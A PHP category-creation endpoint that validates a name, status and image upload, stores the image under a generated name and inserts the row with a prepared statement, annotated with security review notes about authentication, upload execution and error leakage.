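<?php
/**
 * Category creation endpoint.
 *
 * Reads `category_name` (required), `status` (optional, defaults to 'Active')
 * and an optional `image` upload from a POST request, stores the image under
 * uploads/categories/ and inserts a row into tbl_category. Always answers with
 * a JSON object of the form {status: 'success'|'error', message: ...}.
 *
 * Relies on config.php to provide the PDO connection in $pdo.
 */

header('Content-Type: application/json');
include '../../config/config.php';

// NOTE(review): no authentication or authorization check is visible in this
// script. Confirm that config.php (or the web server) enforces one before the
// upload and insert logic below can be reached.

error_log("Category creation request received");

$errors = [];

// Sanitize input
// NOTE(review): FILTER_SANITIZE_STRING is deprecated as of PHP 8.1. It is kept
// here so stored values do not change; SQL safety comes from the bound
// parameters further down, and output escaping belongs where the value is
// rendered.
define('FILTER_SANITIZE', FILTER_SANITIZE_STRING);

/**
 * Trim and filter a single request value.
 *
 * @param mixed $data Raw request value.
 * @return string|false Filtered string; '' when the value is not a scalar
 *                      (e.g. a `field[]` array), so it fails the "required"
 *                      check instead of raising a TypeError in trim().
 */
function sanitizeInput($data)
{
    if (!is_scalar($data)) {
        return '';
    }

    return filter_var(trim((string) $data), FILTER_SANITIZE);
}

// Validate required fields
$name = isset($_POST['category_name']) ? sanitizeInput($_POST['category_name']) : '';
if (empty($name)) {
    $errors[] = "Field 'category_name' is required";
}

// Optional fields
// NOTE(review): status is stored as received; consider an allowlist once the
// set of valid values is confirmed.
$status = isset($_POST['status']) ? sanitizeInput($_POST['status']) : 'Active';

// Handle image upload
$uploadDir = '../../uploads/categories/';
$allowedExtensions = ['jpg', 'jpeg', 'png', 'gif'];
$allowedImageTypes = [IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_GIF];
$maxFileSize = 2 * 1024 * 1024;
$imagePath = null;

// Set only when an upload was submitted AND passed every check below.
$fileTmpName = null;
$fileExt = null;

if (!empty($_FILES['image']['name'])) {
    $fileName = $_FILES['image']['name'];
    $uploadError = isset($_FILES['image']['error']) ? $_FILES['image']['error'] : UPLOAD_ERR_NO_FILE;

    if (!is_string($fileName) || $uploadError !== UPLOAD_ERR_OK) {
        // Covers `image[]` style multi-uploads and PHP-level upload failures.
        $errors[] = "Failed to upload image.";
    } else {
        $candidateTmp = $_FILES['image']['tmp_name'];
        $candidateExt = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
        $fileSize = $_FILES['image']['size'];
        $fileIsValid = true;

        // The extension is client-supplied, so the content is checked as well:
        // the file must parse as one of the allowed image formats.
        $imageInfo = getimagesize($candidateTmp);
        $extensionAllowed = in_array($candidateExt, $allowedExtensions, true);
        $contentAllowed = $imageInfo !== false && in_array($imageInfo[2], $allowedImageTypes, true);

        if (!$extensionAllowed || !$contentAllowed) {
            $errors[] = "Invalid file type. Allowed types: jpg, jpeg, png, gif.";
            $fileIsValid = false;
        }

        if ($fileSize > $maxFileSize) {
            $errors[] = "File size exceeds 2MB.";
            $fileIsValid = false;
        }

        if ($fileIsValid) {
            $fileTmpName = $candidateTmp;
            $fileExt = $candidateExt;
        }
    }
}

// Store the file only when the whole request validated. Previously the file
// was moved into the web root even after the extension or size check failed,
// so a rejected upload (for example a .php file) still landed on disk under
// its original extension.
if (empty($errors) && $fileTmpName !== null) {
    // 0755 instead of 0777: the directory does not need to be world-writable.
    if (!is_dir($uploadDir) && !mkdir($uploadDir, 0755, true) && !is_dir($uploadDir)) {
        $errors[] = "Failed to upload image.";
    } else {
        // Server-generated name; only the validated extension comes from the client.
        $newFileName = uniqid('category_') . '.' . $fileExt;
        $fullPath = $uploadDir . $newFileName;

        if (!move_uploaded_file($fileTmpName, $fullPath)) {
            $errors[] = "Failed to upload image.";
        } else {
            $imagePath = 'uploads/categories/' . $newFileName;
        }
    }
}
// NOTE(review): as defence in depth, the web server should be configured not
// to execute scripts from uploads/categories/ — confirm against the server config.

// Return validation errors
if (!empty($errors)) {
    echo json_encode(['status' => 'error', 'message' => $errors]);
    exit;
}

try {
    $stmt = $pdo->prepare("INSERT INTO tbl_category (name, image, status) VALUES (:name, :image, :status)");
    $stmt->bindParam(':name', $name);
    $stmt->bindParam(':image', $imagePath);
    $stmt->bindParam(':status', $status);

    if ($stmt->execute()) {
        echo json_encode(['status' => 'success', 'message' => 'Category created successfully']);
    } else {
        echo json_encode(['status' => 'error', 'message' => 'Failed to insert category']);
    }
} catch (PDOException $e) {
    // Driver messages can reveal schema and connection details: keep them in
    // the server log and send the client a generic message only.
    error_log("DB Error: " . $e->getMessage());
    echo json_encode(['status' => 'error', 'message' => 'Database error']);
}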